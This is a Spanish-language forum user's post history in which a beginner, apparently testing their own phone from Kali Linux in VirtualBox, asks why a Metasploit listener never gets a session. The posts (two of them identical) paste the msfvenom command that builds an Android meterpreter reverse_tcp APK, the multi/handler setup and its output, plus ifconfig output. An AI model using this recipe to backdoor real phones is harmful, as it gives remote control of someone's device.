Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Szpilman

#2
Perdona estoy empezando en esto y quiero aprender, cuando hablo de dos ip me refiero a la ip local , que empieza por 192. etc. , el objetivo es mi movil, esta conectado a la misma wifi y otras lo tengo solo conectado a la red. Lo estoy haciendo desde virtual box. Que mas datos de puedo dar?


eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
       ether 08:00:27:f1:fc:39  txqueuelen 1000  (Ethernet)
       RX packets 0  bytes 0 (0.0 B)
       RX errors 0  dropped 0  overruns 0  frame 0
       TX packets 158  bytes 27732 (27.0 KiB)
       TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
       inet 127.0.0.1  netmask 255.0.0.0
       inet6 ::1  prefixlen 128  scopeid 0x10<host>
       loop  txqueuelen 1000  (Local Loopback)
       RX packets 404  bytes 31828 (31.0 KiB)
       RX errors 0  dropped 0  overruns 0  frame 0
       TX packets 404  bytes 31828 (31.0 KiB)
       TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
       inet 192.168.0.203  netmask 255.255.255.0  broadcast 192.168.0.255
       inet6 fe80::80f4:c290:e05c:d1a  prefixlen 64  scopeid 0x20<link>
       ether 94:10:3e:ac:df:29  txqueuelen 1000  (Ethernet)
       RX packets 17289  bytes 13937479 (13.2 MiB)
       RX errors 0  dropped 5072  overruns 0  frame 0
       TX packets 15172  bytes 2466021 (2.3 MiB)
       TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
#3
Hola, tengo un problema en Kali linux, estoy haciendo pruebas de seguridad en mi movil, :

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.xxxLPORT=5432 R > android.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8809 bytes

root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
   Is the server running on host "localhost" (::1) and accepting
   TCP/IP connections on port 5432?
could not connect to server: Connection refused
   Is the server running on host "localhost" (127.0.0.1) and accepting
   TCP/IP connections on port 5432?

# cowsay++
____________
< metasploit >
------------
      \   ,__,
       \  (oo)____
          (__)    )\
             ||--|| *


      =[ metasploit v4.16.13-dev                         ]
+ -- --=[ 1697 exploits - 969 auxiliary - 299 post        ]
+ -- --=[ 500 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.xxx.xx.xxx
LHOST => 192.xxx.x.xxx
msf exploit(handler) > set LPORT 5432
LPORT => 5432
msf exploit(handler) > exploit
  • Exploit running as background job 0.

  • Started reverse TCP handler on 192.xx.xxx:5432
    msf exploit(handler) >



    Bien al escribir el comando exploit el problema aparece cuando se queda aqui y no continua.


  • Started reverse TCP handler on 192.xxx.x.xxx:5432
    msf exploit(handler) >

    Deberia aparecer otra linea en espera de activar en mi movil el archivo apk pero no aparece, no se que estoy haciendo mal.

    Tambien he probado utilizando otra ip :
    msf exploit(handler) > set LHOST 127.0.0.1
    LHHOST => 127.0.0.1
    msf exploit(handler) > set LPORT 5432
    LPORT => 5432

    Pero el resultado es este:

    [-] Exploit failed: The following options failed to validate: LHOST.
  • Exploit completed, but no session was created.



    Espero que alguien pueda ayudarme. Gracias
#4
Hola, tengo un problema en Kali linux, estoy haciendo pruebas de seguridad en mi movil, :

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.xxxLPORT=5432 R > android.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8809 bytes

root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
   Is the server running on host "localhost" (::1) and accepting
   TCP/IP connections on port 5432?
could not connect to server: Connection refused
   Is the server running on host "localhost" (127.0.0.1) and accepting
   TCP/IP connections on port 5432?

# cowsay++
____________
< metasploit >
------------
      \   ,__,
       \  (oo)____
          (__)    )\
             ||--|| *


      =[ metasploit v4.16.13-dev                         ]
+ -- --=[ 1697 exploits - 969 auxiliary - 299 post        ]
+ -- --=[ 500 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.xxx.xx.xxx
LHOST => 192.xxx.x.xxx
msf exploit(handler) > set LPORT 5432
LPORT => 5432
msf exploit(handler) > exploit
  • Exploit running as background job 0.

  • Started reverse TCP handler on 192.xx.xxx:5432
    msf exploit(handler) >



    Bien al escribir el comando exploit el problema aparece cuando se queda aqui y no continua.


  • Started reverse TCP handler on 192.xxx.x.xxx:5432
    msf exploit(handler) >

    Deberia aparecer otra linea en espera de activar en mi movil el archivo apk pero no aparece, no se que estoy haciendo mal.

    Tambien he probado utilizando otra ip :
    msf exploit(handler) > set LHOST 127.0.0.1
    LHHOST => 127.0.0.1
    msf exploit(handler) > set LPORT 5432
    LPORT => 5432

    Pero el resultado es este:

    [-] Exploit failed: The following options failed to validate: LHOST.
  • Exploit completed, but no session was created.